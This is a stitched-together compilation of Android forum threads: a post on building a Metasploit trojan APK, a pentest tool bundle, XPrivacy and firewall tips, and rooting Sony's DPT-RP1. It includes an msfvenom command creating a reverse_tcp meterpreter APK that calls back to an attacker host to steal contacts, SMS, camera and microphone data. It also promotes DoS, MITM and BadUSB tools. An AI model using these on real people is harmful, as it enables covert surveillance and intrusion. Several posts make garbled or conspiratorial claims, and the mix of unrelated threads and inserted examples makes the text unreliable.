VULNERABILITY IN ALL Android Devices - Security Discussion

Code:
This is just for educational purposes, nothing else.
So while I was learning about Linux, I came to know that there is a distro of Linux called Kali Linux. Kali Linux basically has 300+ hacking tools and has the Metasploit framework in it. Basically it will either create a Windows Trojan or an Android Trojan. I researched it a bit and came to know that you basically type the following in the terminal:
Code:
msfvenom androidmeterpreter/reverse_tcp LHOST=YOUR IP LPORT=ANY3/4DIGITS R > anyname.apk
This command compiles an .apk with the payload in it.
When installed on an Android device it is installed as MainActivity.apk.
It can access a phone's contacts, SMS logs, call logs, MICROPHONE, CAMERA!!!, device tree, contents of the device, keylogs, etc.
It is a light trojan (not more than 0.3 MB) and can run in the background unnoticed. This information from your device is streamed to the hacker and compromises your security. So never download unknown APKs from the web.
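Added example, not code from the post above: a triage script that reads the permission strings out of an unknown APK's compiled manifest and reports which of the capabilities the post lists (contacts, SMS, call log, microphone, camera) the app asks for, so the check can be made before sideloading. The sample APK is constructed inside the script, and the risk categories are this example's own grouping rather than anything from Android.

```python
"""Permission triage for an unknown APK.

Added example, not code from the forum post. It reads AndroidManifest.xml out
of the APK zip and scans the compiled (binary XML) string pool for permission
names. Compiled manifests store strings as UTF-16LE or UTF-8, so both
encodings are searched; that is enough for triage without a full AXML parser.
"""
import io
import sys
import zipfile

# Permissions that map to the capabilities the post warns about. The category
# names are this example's own grouping, not an Android API.
RISKY_PERMISSIONS = {
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.READ_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.CAMERA": "camera",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.READ_EXTERNAL_STORAGE": "files",
    "android.permission.RECEIVE_BOOT_COMPLETED": "auto-start",
}


def manifest_bytes(apk_bytes):
    """Return the raw AndroidManifest.xml entry (an APK is a zip file)."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return zf.read("AndroidManifest.xml")


def find_permissions(manifest):
    """Permission names present in the manifest's string pool.

    Substring matching can over-report (CAMERA also matches longer names that
    start with it), which is acceptable for a triage pass."""
    found = set()
    for perm in RISKY_PERMISSIONS:
        if perm.encode("utf-16-le") in manifest or perm.encode("utf-8") in manifest:
            found.add(perm)
    return found


def triage(apk_bytes):
    """Summarise what the APK can reach, plus its size (the post notes the
    trojan it describes is tiny, so size alone is not a signal)."""
    perms = find_permissions(manifest_bytes(apk_bytes))
    return {
        "permissions": sorted(perms),
        "capabilities": sorted({RISKY_PERMISSIONS[p] for p in perms}),
        "size_kb": round(len(apk_bytes) / 1024, 1),
    }


def looks_like_spyware_profile(report):
    """Flag the combination the post describes: a recording capability
    together with access to personal records. Legitimate apps can have this
    too, so treat it as a reason to investigate, not a verdict."""
    caps = set(report["capabilities"])
    records = {"contacts", "SMS", "call log"}
    recording = {"microphone", "camera"}
    return bool(caps & recording) and bool(caps & records)


def build_sample_apk(permissions):
    """Constructed sample for offline runs: a zip whose fake manifest holds
    the given permission names in UTF-16LE, as a compiled manifest does."""
    pool = b"".join(p.encode("utf-16-le") + b"\x00\x00" for p in permissions)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + pool)
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real APK given on the command line.
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        # Constructed sample with the profile the post describes.
        data = build_sample_apk([
            "android.permission.INTERNET",
            "android.permission.READ_SMS",
            "android.permission.READ_CONTACTS",
            "android.permission.RECORD_AUDIO",
            "android.permission.RECEIVE_BOOT_COMPLETED",
        ])
    report = triage(data)
    print(report)
    print("investigate" if looks_like_spyware_profile(report)
          else "no spyware-style combination")
```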

In /system/app, by default, there is a stock app called DefaultContainer.apk (fixed)
All Android devices have a DRM server and DefaultContainer.apk
Someday I thought: "what if I disable this app?"
Well, good question:
Answer is (when trying to install by brute force or PackageInstaller with DefaultContainer.apk disabled)
Result:
Unable to install package...
No exploits like this will be done any time soon.
Sent from SomeFon

Either Google Inc. or AOSP must ensure that exploits of this nature don't happen in the future...

Can you post a link to the exploit's documentation on Metasploit? I'm running Kali on my MacBook and my Android tablet - and I don't see how that exploit is still open. Looks closed based on quite a few security & OS upgrades since it was found.

yawn... you might as well have titled this "Water found in ocean"
For starters Android is awesome and very very flawed (like most 10/10 chicks you will ever meet). This has been a media circus for like 10 yrs now I think.... especially as of very recently we have all concluded that Android isn't secure enough to order pizza online (seriously). Every few months there's a headline "huge vulnerability detected in Android, patch unavailable but uhhh coming soon" (5 yrs later).
As for Kali, it's the successor or second edition to BackTrack Linux. These are distros specifically made for penetration testing. Basically it's another tool for network security experts to assess the condition of a network's known vulnerabilities that haven't been patched yet. Using Metasploit you are able to scan a network to find any unpatched bugs and then it will apply the exploit for you. Also I assure you it is much more complicated than typing one command into a box.... one day lol. Ohhh and those pentesting distros (BackTrack is now retired) are nothing special... it is just a basic version of Linux that comes preinstalled with a TON of basically every security app you would ever want. It is generally not recommended to run Kali as your personal OS, especially if you are teh noobcakes..

Don't use the Blackmart app.
This is dangerous malware masked as
a parallel market.
DON'T use ANY MARKET APP
TRY TO cut BY BRUTE FORCE ON YOUR DEVICE and urgently delete all of Google's apps!!
These apps are sending random authentic .jar files and .dex files, to execute these binaries from the cache folder of these damn "markets"
Jar files and dex files, ACCORDING TO THE ANDROID MASTER KEY,
may gain root, may destroy your GPU, or simply your device does not boot anymore.
I tried to continue using the Blackmart app with a locked cache folder.
The app refuses to start.
The app NEEDS THE CACHE FOLDER FREE
for starting its CHEATS.
AN APP THAT DENIES STARTING WHEN THE CACHE FOLDER IS LOCKED IS MALWARE!
The app curiously worked with a locked cache after a few days, but now it is refusing.
BEWARE OF ALL THE CHIT THAT GOOGLE'S SICK AND THEIR PEST SLAVES ARE DOING TO YOU
Sent from Somefon

epic wow.... like just woah
I tried to continue using the Blackmart app with a locked cache folder.
The app refuses to start
This, my friend, was not an educated decision whatsoever... "Google's got the freakin' kung fu grip on me nads so I guess I will just burn it all down" hmmm
I completely kinda mostly agree with what you posted about Google, "which is government owned and operated now for some time... along with their butt buddies Facebook..." My humble suggestion would be to (VERY CAREFULLY) learn how to root, unlock the bootloader and then install a custom ROM like CyanogenMod on your cellphone. And yeah, I would never ever recommend pirating Google Play... just.... no!
But really it doesn't matter in the end... Android is sooooooo filled with critical exploits..... I wouldn't lose any sleep over it.... and don't worry, all the same it will only get worse over time with Google and the bully things that bullies do.

The exploits are born on a critical OS, which began in a DAMN INC. NAMED GOOGLE, that DOES NOT RECOMMEND ROOT, BECAUSE THEY ARE ROOT.
I have never seen a Windows or Unix-like OS without root.
Have you seen any Linux LAN vulnerable to "exploits"??
If yes, pass me the trick to hack the entire Facebook and Opera servers!
Sent from Somefon


Prevent Google from Deleting / Installing Programs

Hi,
I don't have an Android phone yet. But I'm still a little bit frightened about data security there.
I read this article:
hxxp://w ww.theregister.co.uk/2010/06/28/google_remote_android_application_install/
I think normally you should decide yourself what to uninstall and what not.
So my question is: would it be possible to prevent Google from accessing your phone, meaning prevent them from installing/uninstalling applications?
Because I hate this. My phone is my phone and they aren't allowed to play the "admin".
Regards
eagle
fear not
If you read further into this, they are talking about malicious apps, and it is done for the malicious app or apps only. They are actually protecting your phone from being crippled, and it is done system-wide for those that use the Market.
APKs installed from SD can't be touched by Google. Only ones installed from the Market can be removed. AFAIK so far they have only removed malicious apps (so far), but Google's definition of malicious is different to mine.
Hi,
thank you for your answers! I know that they removed only a malicious app... but like mercianary already said: this time they only removed a malicious app...
They could instead (of remote uninstall) just release a "fix" that you can download over the Android Market, and this fix then cleans your mobile phone...
At least they can't remove stuff that you installed from SD... this is good...
But is there a way to modify the ROM so they won't have any access any more?
Or can you disable this if you've got root rights?
Regards
eagle
P.S.
What else can google do with your phone ? What do they log ?
They take your soul. Piece by piece. Slowly over the years. Just like they do with every other product they give you for "free"
But that's another thread...
Sounds like humor but it's probably right :-/
The fact is...:
I waited all this time for Windows Phone 7. Thought that they would make it a good OS... but now... no multitasking, ugly menu... it seems to me worse than iOS (subjective opinion =)).
You don't have enough options/settings and so on. It looks to me like they try to copy Apple now, and they don't try to make it better =(
And now Android comes with tethering, hotspot ability, a nice menu... a "free" market, and so on.
Were I not afraid of Google, I would choose it without hesitation.
Do you have any pro points for Win7 Phone?
----
Don't get me started on Microsoft...
It's certainly possible to mod the Market to disable this feature. Of course you would need root to do this.
Well, with custom ROMs and ROM-specific apps you shouldn't have to worry, because essentially you are loading an update zip, so I think you'll be OK there, and they would be morons to start randomly messing with people's phones.
Hi,
nice answers =) I like you; I already got some.
New questions:
- Are there already such modified ROMs?
- If not, will there be some?
- @mercianary why shouldn't I get you started on Microsoft? Start please
What is your fav OS? Are you scared of Google, too?

PenTesters_Paradise ~ Take Your ROM to the Next Level

PenTesters_Paradise
Code:
DISCLAIMER
I can not be held responsible for how you use this package.
I am also not to be held responsible if flashing this package
damages your device in anyway. This package is for
educational use only and should not be taken lightly. This is
the exact package that I use for my 2nd job, and is not meant
to just be played with willy nilly. Ask permission before doing
anything in public OR private.
PenTesters_Paradise
This package was originally supposed to be a custom ROM, but I wanted to give everyone an equal opportunity to enjoy this package, so I converted it to something everyone can use! This package isn't for the faint of heart. This is for those of you curious about pen testing and for those who basically want to feel like they're bringing Watch_Dogs to the real world. Below I will explain the package, and what each item can actually do. I will also have YouTube videos (when I get the time to record them) explaining each app and package. I also have some custom content coming, some that will be shown off and not released as well. Please enjoy and remember to play it safe and always ask permission first before using any of these packages or tweaks.
What's A Pen Tester?
If you're asking yourself this question, this package MIGHT NOT be for you. A pen tester is either a white hat or grey hat hacker that gets hired by individuals or companies to basically purposely hack their products, networks, or any other sorts of electronically based applications. Pen testers are becoming a big deal, especially in the gaming world. Dev companies are starting to get smart and are realizing that they honestly can't BEAT the hackers without TRUE HACKERS of their own. This is slowly becoming a big money lifestyle and more and more people want into it. This is basically your "License to Kill" when it comes to a product/project/etc. when the company or individual gives you the green light to crack in and have at it.
Package Includes
Screen Shots will be added to the 3rd post of this thread, tutorials for each app and the change log to the 2nd
AnDOSid
This app is an Android-based DoS attacker. Basically, this app allows you to simulate a DoS (Denial of Service) attack as an HTTP POST flood attack on either another person or a web server.
NetSpoofer
Network Spoofer lets you change websites on other people’s computers from an Android phone. Simply log onto a Wifi network, choose a spoof to use and press start. This can be a lot of fun, but always ask first.
AndroidVNC
please see this thread for all the info about this
http://forum.xda-developers.com/showthread.php?t=497187
aWPScan
This app lets you scan WordPress-based sites for exploitable entrances to the site's admin panel. Fairly simple to use and can sometimes come in handy when working for a client and building them a WP-based site.
DroidSheep and FaceNiff
These apps were popular for a very short time but are very powerful. They both kind of have the same functions, as they work as a MITM (Man In The Middle) attacker service. Basically, log in to any WiFi hot spot, and you will start capturing web traffic. You can manipulate the web traffic to do as you want from here.
DroidSheep Guard
This app guards you from anyone else using Droid Sheep. I'm not entirely sure if it will guard against FaceNiff as well.
DriveDroid
This app basically turns your device into a disc image mounting device. Basically, you can take an ISO or IMG file, mount it with this app, and install full operating systems to another PC. Read below on how to work it with the Galaxy S5 specifically, as there's 1 special step you need to know.
1.) Run the app and go through the setup.
2.) When you get to the selection about selecting a driver, select the 3rd item, which should be a "Legacy USB Driver".
3.) When you get to the point about TESTING it and restarting your PC, this is where the trick lies.
3a.) As your PC boots up, boot directly to your BIOS (for HP and ASUS it's either Escape or F2; not sure about others off the top of my head).
4.) From here, make sure your phone has connected successfully in MTP mode.
4a.) Go into Drive Droid (After MTP has been set), and select the IMG or ISO you wish to emulate from your device.
4b.) In the BIOS, Save Settings and restart (I know you didn't change anything, hear me out)
5.) From here, you need to test...
5a.) You'll either (after the bios loading screen) boot directly to the ISO or IMG, or into your standard OS.
6.) If you boot directly to your standard OS, reattempt from step 3 onwards, but at step 5, go to 6a
6a.) When the PC restarts, bring up your Boot Menu of options (F12 I believe on ASUS and HP)
6b.) From here, select the Samsung device listed, and it should boot!
dSploit
dSploit is a package of all sorts of tools ranging from MITM attacks to DOS attacks, and other testing abilities. Plenty of videos around on how to use this app.
HackAppData
This is for any app on your device. This app lets you modify the AppData of any application installed on your device.
Hackers Keyboard
Just a highly customizable keyboard.
Network Mapper
This app simply maps out the WiFi Network you are currently connected to, showing you every device connected.
Shark
Basically WireShark for Android. Lets you see incoming and outgoing data packets from your device and other things on the network.
Penetrate Pro
No this isn't a dirty joke (couldn't resist), This app works with decoding WiFi connections to allow you to connect to locked and private connections.
SQLMap
SQLMap is one of the most highly used tools around for SQL injection attacks, as it's basically the best automated tool for it. There's tons of tutorials out there about it and soon I'll post one of my own.
LockScreen Widgets Tweak
Created by BigBot96, this tweak lets you apply Widgets to your lock screen. PLEASE Make sure you download the correct file. Currently, only the NE9 builds are supported with this tweak, but I'll have an option available for you to not have to worry about this.
Coming Soon...
Future Additions will be coming around soon for this, so keep checking the thread!
Kali Linux NetHunter Features.
So far, only supported by the Nexus devices, I'm attempting to port over the apps and data for this to the S5 as the first non-Nexus device to have support for Kali Linux control. Below will be the list of what will be included.
KaliLauncher
This is the heart of the NetHunter features. This controls everything, and launches all the different exploits available through Kali Linux. To learn more, keep reading
BadUSB
BadUSB is a form of undetectable malware that is applied to specific USB devices that match the exploit. Basically, this hijacks your USB plug while your device is connected to a (Windows-based) computer, and lets you install a faulty driver to it that houses your malware files. You could use this to transfer things like botnets, trojans, and many other forms of malware to a user's system and they'd never even know.
DNSSpoofer
Basically, this tool just spoofs the DNS connection you're using or the other person/s are using and lets you reroute people. DNS Attacks are few and far between, but they're slowly getting easier.
PowerSploit
I'll admit, I haven't read up on this yet, but when I have, I'll edit this lol.
NoUpStream
This stops any up stream data entirely.
Other Future Additions
Basically, I'd like to convert this to something like a "Mini-ROM" that gives you a launcher, themed Gapps, themed system apps, and much more, but for now, this is the temp solution. The next update should have at least a custom boot animation.
How-To Install
1.) Transfer the ZIP file that matches your device to your SD card or internal storage
2.) Boot up into recovery mode and Flash the ZIP
3.) Done!
Special thanks to the creators of all these apps, scripts and tweaks that are being applied to this package. The ZIP packages below simply just need to be flashed to your Android device via SafeStrap (only method I can test). If someone could test a standard TWRP on a Dev Edition or another unlocked device, that'd be awesome.
Download Links Below
UPLOADING NEW ONES AFTER THE NEXT FLASH Test.
Thought it was ready, and realized it wasn't.
All apps are force closing -_- I'll fix it when I wake up. I've been at it for 12 hours now
Planning on updating this/adding a download?
Nice waiting anxiously for this
Waiting like wagging dog.... I went to source and got working nice..like to wait for add ons.
http://forum.xda-developers.com/showthread.php?p=3518324
Subscribed.
Sent from my SM-G900V using Tapatalk
lol he posted this weeks ago.. he's responding in his ROM thread also, saying he was working on a new ROM which isn't out yet, and said a week or two ago that his T-Mo buddy got 5.0 Lollipop, which was false lol, so not sure if and when this will actually be uploaded.. it's been here for weeks with no zip or APKs at all in the themes n apps section..
most of these APKs are stuff you can manually install if you don't want to wait :-/
Reinventing the wheel
Kali NetHunter has been out for a while for the S5 variants; it's like having a VM copy of Kali on your Galaxy S5. The instructions/apps/kernel are all available:
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 All the other apps he's talking about are available; just search on Google or download an app called Bugdroid Pro from the app store. It provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything... I'm pretty sure those security holes they exploit have been patched.
dmayniak said:
Kali NetHunter has been out for a while for the S5 variants; it's like having a VM copy of Kali on your Galaxy S5. The instructions/apps/kernel are all available:
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 All the other apps he's talking about are available; just search on Google or download an app called Bugdroid Pro from the app store. It provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything... I'm pretty sure those security holes they exploit have been patched.
lol the last comment was me about 2 years ago
elliwigy said:
lol the last comment was me about 2 years ago
I know, right? lol I gave up on this because at the time I sucked at making flashable zips
Vortell said:
It would be cool if you started it back up!
The reason I haven't is because Kali Linux has an official release for this phone as long as your bootloader is unlocked and you're on CM

What to block in XPrivacy & apps/modules like it..??

Hi everyone..
Nice to join you all...
I have come to suffer a lot in controlling some apps' permissions using the awesome XPrivacy.
So I thought of starting this post so we can help each other out..
_ Prior to XPrivacy 3.6.5 I was able to control almost anything.. now, for example, I just can't control permissions for some apps, i.e. Mobogenie.com.
It still reads my media even though I have them blocked..
It is still able to read my location..
So I started this thread so we can all share "out of experience" how to get the best out of XPrivacy..
P.S.
I've searched for similar posts & found nothing.. I hope that I haven't overlooked similar posts.
Ultimous said:
Hi everyone..
Nice to join you all...
I have come to suffer a lot in controlling some apps' permissions using the awesome XPrivacy.
So I thought of starting this post so we can help each other out..
_ Prior to XPrivacy 3.6.5 I was able to control almost anything.. now, for example, I just can't control permissions for some apps, i.e. Mobogenie.com.
It still reads my media even though I have them blocked..
It is still able to read my location..
So I started this thread so we can all share "out of experience" how to get the best out of XPrivacy..
P.S.
I've searched for similar posts & found nothing.. I hope that I haven't overlooked similar posts.
We already have an official thread for XPrivacy: http://forum.xda-developers.com/xposed/modules/xprivacy-ultimate-android-privacy-app-t2320783
All issues should be reported on Github: https://github.com/M66B/XPrivacy
Thanks
Done, & thank you, Primokorn
I never get the part why people install apps they don't trust and try to block stuff with external apps. If you're unsure, just test it on emulators like the SDK-integrated emulator, Bluebox or others and see what the app does.
And no, XPrivacy can't block all stuff. So I highly recommend just not installing apps if you're unsure, or testing them as mentioned in an emulator. As much as I love XPrivacy, it's much over-hyped and overrated; with some brain you don't need this app, and also not if your ROM already supports the Privacy Guard stuff (mostly on CM-based ROMs).
.... and I'll never understand why some people wanna clone themselves into people & condemn anything that is not their own preference...
XPrivacy is a breakthrough.. and it is Android as far as I am concerned, until someone brings to life a ROM that respects people's right to privacy.. feel free to differ, CHEF-KOCH, but please do not impose.. thank you
CHEF-KOCH said:
I never get the part why people install apps they don't trust and try to block stuff with external apps. If you're unsure, just test it on emulators like the SDK-integrated emulator, Bluebox or others and see what the app does.
And no, XPrivacy can't block all stuff. So I highly recommend just not installing apps if you're unsure, or testing them as mentioned in an emulator. As much as I love XPrivacy, it's much over-hyped and overrated; with some brain you don't need this app, and also not if your ROM already supports the Privacy Guard stuff (mostly on CM-based ROMs).
Sometimes you don't have a choice. Maybe all your friends are using a particular messaging service, or perhaps the app is critical, or at least too useful for your job, to give up.
Just don't let other people control you; you always have a choice. If all people say jump from a bridge, will you do it too?
Just tell your friends you take care of your privacy data and ask them to install a similar and possibly more secure alternative. If you really need services which don't respect your privacy, tell us how a tool like XPrivacy can block all this. If you block all connections you will never be able to use their services. And some stuff can't be faked since this will break the functions. So I see no argument at all.
Who said anything about "breaking connection"..?!! Mind you that we all know about this new thing called "internet" & we do use it.. "who would've thought..!!!" & breaking the connection means that no creature called "NET" will ever exist on our devices
And where did you find us, "users of XPrivacy & author/developer", saying that XPrivacy protects everything against everything?
There seem to be some communication issues here..
Tell you what, CHEF-KOCH.. why don't you write/do something that eventually could make us throw XPrivacy into the abyss of the forgotten.
I am sure you are capable of achieving this task for me & my friends and for the rest of the world that is really hungry for your wisdom
Xprivacy is about the main reason I still use my android device with internet.
I'm not as paranoid as I should be, but this is how I use XPrivacy.
It's around 90% successful to start out (which means 90% of the time I don't just boot loop from the start).
Shave head to avoid pulling hair out
Remove Sim card try to find someplace WiFi inaccessible.
Fresh install of a ROM with as many apks I don't use as possible.
(Apks are removed from the zip file before I flash the ROM)
Install xposed (I never make it a system app by putting it in the zip because that can cause update issues)
Install XPrivacy, set expert mode on, set all the expert features on, randomize everything at boot.
Reboot into recovery, backup everything
Reboot into device
start x privacy.
Edit template to block every last little thing. except inet.
Apply template to everything except android system, Phone, and system ui. (You can turn those ones off before you apply template).
Reboot device and hope for the best.
If it boots, let it settle and watch for errors.
After a while (your choice on how long) boot into recovery and do another full backup.
Start x privacy edit template to block everything
Manually change 1/4 of system apps to block inet.
Reboot and check for errors, if good do a recovery back up,
If bad restore your backup and change less "inet" restrictions.
repeat until everything is blocked for Inet you can block.
(This can) take hours.
Export your settings from time to time.
Next systematically block the various restrictions on phone, android system and system ui until they are tight as you can make them.
Install the newest AFWall+ and use whitelist mode to block everything (after setting it up in XPrivacy, of course).
Install network log to check network.
Use the "usage data" to give the minimum permissions required to use the system apps you need to use.
(Back up in recovery and export settings often, as there is nothing worse than boot looping your device after hours of work)
All newly installed apps should be completely restricted at install, and you have to remove the restrictions one at a time to get them working with minimal access.
Yes I do this every time I install a new rom.
Yes I would love to hear of a better way
No I can't just import all the settings from a different ROM
Boot loops are just too hard to track down with a large import
I have found some apps have no restrictions for a few seconds right after install. So I never install anything with internet connected and I always wipe the apps data and cache after I have it set up in x privacy and before I use the internet.
One day I will build XPrivacy from source so it can block the Android system identification section. That is disabled by default now. With all the apps that factory ROMs and even AOSP ROMs dump into uid 1000, it's just too open for me to love.
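Added example, not AFWall+'s own code: the iptables rules that the "whitelist mode" step in the post above amounts to on a rooted device. AFWall+ uses the same per-UID owner match internally; the chain name AFWALL_EG and the two app UIDs are this example's own constructed values. The function prints the rules rather than applying them, so the ruleset can be reviewed (or diffed against `iptables -S`) before it is run as root.

```shell
#!/bin/sh
# Added example (not AFWall+'s own script): generate an outbound whitelist
# ruleset for a rooted Android device. Each Android app runs under its own
# UID, which is what the iptables owner match keys on. The chain name below
# is this example's own choice.

gen_whitelist_rules() {
    # $@ = app UIDs allowed to reach the network (e.g. 10042; the mapping
    # from package to UID is visible on the device with `pm list packages -U`).
    printf 'iptables -N AFWALL_EG 2>/dev/null\n'
    printf 'iptables -F AFWALL_EG\n'
    # Loopback and replies on already-accepted connections never leave the device.
    printf 'iptables -A AFWALL_EG -o lo -j ACCEPT\n'
    printf 'iptables -A AFWALL_EG -m state --state ESTABLISHED,RELATED -j ACCEPT\n'
    for uid in "$@"; do
        case "$uid" in
            ''|*[!0-9]*) echo "skipping non-numeric uid: $uid" >&2; continue ;;
        esac
        printf 'iptables -A AFWALL_EG -m owner --uid-owner %s -j ACCEPT\n' "$uid"
    done
    # Whitelist semantics: anything not listed above is rejected, and the
    # rejection is logged (rate-limited) so a tool like Network Log can show
    # which UID tried to connect.
    printf 'iptables -A AFWALL_EG -m limit --limit 5/min -j LOG --log-prefix "AFWALL-EG-DROP: "\n'
    printf 'iptables -A AFWALL_EG -j REJECT --reject-with icmp-port-unreachable\n'
    # Hook the chain into OUTPUT exactly once.
    printf 'iptables -C OUTPUT -j AFWALL_EG 2>/dev/null || iptables -I OUTPUT -j AFWALL_EG\n'
}

# Number of per-app ACCEPT rules the generated ruleset contains.
count_accept_uids() {
    gen_whitelist_rules "$@" | grep -c -- '--uid-owner'
}

# Example: allow only two constructed app UIDs. Review the output, then pipe
# it to `su -c sh` on the device to apply it.
gen_whitelist_rules 10042 10107
```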
That was a pretty good post @nutpants, .. Thank you

Rooting Sony's e-reader DPT-RP1 and DPT-CP1

Update (5/18/2019)
Since the first tool was released, HappyZ has improved many features, so I think I can just refer to:
* HappyZ's rooting guide: https://github.com/HappyZ/dpt-tools/wiki/The-Ultimate-Rooting-Guide
- The only thing I want to add as a Windows user (because the guide is for Mac/Linux users) is that it gets much easier if you use a Linux-like terminal such as Cygwin, and the port name should be something like COM#, where # can be found in Device Manager by comparing before/after you attach the device.
* HappyZ's upgrade guide: https://github.com/HappyZ/dpt-tools/wiki/The-Upgrade-Guide (I recommend reading this before/after you update to the new firmware.)
You may donate a cup of coffee to him there. Thanks to all others who contributed a lot.
--
Update (12/02/2018) -- These are outdated.
Finally we managed to root the device! Many thanks to all of you for your efforts.
Just refer to HappyZ's well-written guide: https://github.com/HappyZ/dpt-tools
For those who have never used Python like me (and are probably using Windows):
(1) Install Python 3 and add it to PATH.
(2) Install MINGW64 and run the scripts there instead of PowerShell, due to an xxd issue if you are on Windows.
(3) pip install httpsig pyserial in bash.
(4) Download HappyZ's dpt-tools and unzip.
(5*) (This step is no longer needed; the issue was fixed by HappyZ.)
(6) Follow HappyZ's guide. You should execute dpt-tools.py in the folder you unzipped in order to use get-su-bin, because of how the script is written.
Some suggestions after rooting (let me know if you have better ideas):
Here is my setup: install "E-ink Launcher" and "Multi action home button" using adb install.
Use adb shell am start -a android.intent.action.MAIN to change the main launcher to your launcher.
Then change the settings of Multi Action Home Button (say, the height should be large to be visible at the bottom) and assign its function to be Home for click and Back for double-click.
Whenever you want to use Sony's apps (these are good for PDF markup), just push the home button to open the pop-up menu.
Otherwise, touch the Multi Action Home Button to access other Android apps. So far I've never experienced any crash.
Yet more tips:
Some complain fonts are too small after installing generic apps.
adb shell wm density 320 changes your DPI by 2 times (160 is the default value). EDIT: I found 200 is quite enough and does not distort Sony apps too much.
My application is using "Tasker" to execute the above command when specific apps are opened and execute wm density reset when the apps are closed.
The reason why we cannot change the global DPI is sadly because it makes the default apps by Sony so awkward.
Alternatively, I could successfully install Xposed to try App Settings, but this app crashed.
You can also install Gboard (but it has no hide button, so prepare a virtual back button) if you need another keyboard.
Enjoy your DPT devices
--
Sony recently released a new digital paper device, the DPT-RP1, apparently using their own Linux firmware but with Android 5.1.1 underlying it. A few weeks ago, some Chinese hackers successfully jailbroke it for third-party apps (without changing the original firmware), but they don't share any information, so that they can sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China, so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses the Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (with the same version, 5.1.1) with this chip: the Samsung Xcover 3 and the Samsung Galaxy Grand Prime. Fortunately, they have both been rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak the DPT-RP1? I think the problem here is that it does not look like Android at all, so it has no settings menu or developer tools. And I'm not sure how to enter recovery mode since it only has two buttons: power/menu.
I'd appreciate any help or advice. Thanks!
And here you can find the source code.
oss.sony.net/Products/Linux/dp/DPT-RP1.html
sartrism said:
Sony recently released a new digital paper device, the DPT-RP1, apparently using their own Linux firmware but with Android 5.1.1 underlying it. A few weeks ago, some Chinese hackers successfully jailbroke it for third-party apps (without changing the original firmware), but they don't share any information, so that they can sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China, so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses the Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (with the same version, 5.1.1) with this chip: the Samsung Xcover 3 and the Samsung Galaxy Grand Prime. Fortunately, they have both been rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak the DPT-RP1? I think the problem here is that it does not look like Android at all, so it has no settings menu or developer tools. And I'm not sure how to enter recovery mode since it only has two buttons: power/menu.
I'd appreciate any help or advice. Thanks!
You must be an iPhone user that isn't familiar with Android. Jailbreaking is an Apple thing, not an Android thing.
In Android it's called "rooting", and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreaking is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
Thanks for suggesting a general principle! I just used the word jailbreaking, not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from under the current customized Linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It apparently has no typical bootloader, and neither a PC nor adb recognizes it as an android device. In fact, direct USB file transfer is blocked, so I need to use Sony's designated software. But an android system surely coexists, according to the hacker who already rooted it.
sartrism said:
Thanks for suggesting a general principle! I just used the word jailbreaking, not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from under the current customized Linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It apparently has no typical bootloader, and neither a PC nor adb recognizes it as an android device. In fact, direct USB file transfer is blocked, so I need to use Sony's designated software. But an android system surely coexists, according to the hacker who already rooted it.
Without some kind of way to flash or interface with the device there isn't much you can do.
I have a kindle fire HD that didn't come with a typical android system but does have a typical bootloader. The Amazon OS was removed and now it's full blown android but it required a "second" bootloader. You don't have a bootloader so I'm not sure what your options are with that device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreaking is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
